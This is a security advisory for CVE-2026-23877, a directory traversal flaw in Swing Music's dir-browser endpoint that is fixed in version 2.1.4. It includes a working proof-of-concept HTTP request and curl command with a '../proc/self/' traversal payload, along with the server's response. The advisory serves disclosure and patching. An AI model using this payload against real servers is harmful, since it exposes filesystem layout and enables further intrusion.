GHSA-pj88-9xww-gxmh

Опубликовано: 21 янв. 2026

Источник: github

Github: Прошло ревью

CVSS4: 5.3

Описание

Swing Music has a Directory Traversal & Filesystem can be accessed by a non-admin user

Summary

Swing Music's list_folders() function in the /folder/dir-browser endpoint is vulnerable to directory traversal attacks. Any authenticated user (including non-admin) can browse arbitrary directories on the server filesystem.

Details

The @api.post("/dir-browser") endpoint lacks proper path validation and authorization checks:

No authorization requirement: Any authenticated user can access the endpoint
Improper path handling: The code attempts to prepend "/" to non-existent paths but this doesn't prevent traversal:

req_dir = pathlib.Path("../../../../etc") # → PosixPath('../../../../etc') if not req_dir.exists(): # → False req_dir = "/" / req_dir # → PosixPath('/../../../../etc')

PoC

Create a non-admin user
Authenticate as a non-admin user
Send the following request:

POST /folder/dir-browser HTTP/1.1 Host: IP:1970 Content-Type: application/json Cookie: access_token_cookie=non-admin-access-token Connection: keep-alive {"folder":"/music/../proc/self/", "tracks_only":false}

curl --path-as-is -i -s -k -X $'POST' -H $'Content-Type: application/json' -b $'access_token_cookie=non-admin-access-token' \ --data-binary $'{\"folder\":\"/music/../proc/self/\", \"tracks_only\":false}' \ $'http://IP:1970/folder/dir-browser'

The response will list directories from /proc/self instead of restricting to user-accessible paths:

HTTP/1.1 200 OK Content-Type: application/json Content-Length: 466 Vary: Accept-Encoding Connection: Keep-Alive {"folders":[{"name":"attr","path":"/music/../proc/self/attr"},{"name":"cwd","path":"/music/../proc/self/cwd"},{"name":"fd","path":"/music/../proc/self/fd"},{"name":"fdinfo","path":"/music/../proc/self/fdinfo"},{"name":"map_files","path":"/music/../proc/self/map_files"},{"name":"net","path":"/music/../proc/self/net"},{"name":"ns","path":"/music/../proc/self/ns"},{"name":"root","path":"/music/../proc/self/root"},{"name":"task","path":"/music/../proc/self/task"}]}

Impact

Information Disclosure:

Server filesystem structure and layout
Configuration file locations and names
User account names from directory listings
Software versions and installed packages
Log file locations and system paths

Additional Risks:

Preparation for further attacks (LFI, RCE)
Bypass of access control mechanisms
Exposure of sensitive directory structures

Ссылки

Пакеты

Наименование

swingmusic

pip

Затронутые версииВерсия исправления

< 2.1.4

2.1.4

EPSS

Процентиль: 45%

0.00224

Низкий

5.3 Medium

CVSS4

CVE ID

CVE-2026-23877

Дефекты

CWE-25

Связанные уязвимости

CVE-2026-23877

nvd

20 дней назад

Swing Music is a self-hosted music player for local audio files. Prior to version 2.1.4, Swing Music's `list_folders()` function in the `/folder/dir-browser` endpoint is vulnerable to directory traversal attacks. Any authenticated user (including non-admin) can browse arbitrary directories on the server filesystem. Version 2.1.4 fixes the issue.

EPSS

Процентиль: 45%

0.00224

Низкий

5.3 Medium

CVSS4

CVE ID

CVE-2026-23877

Дефекты

CWE-25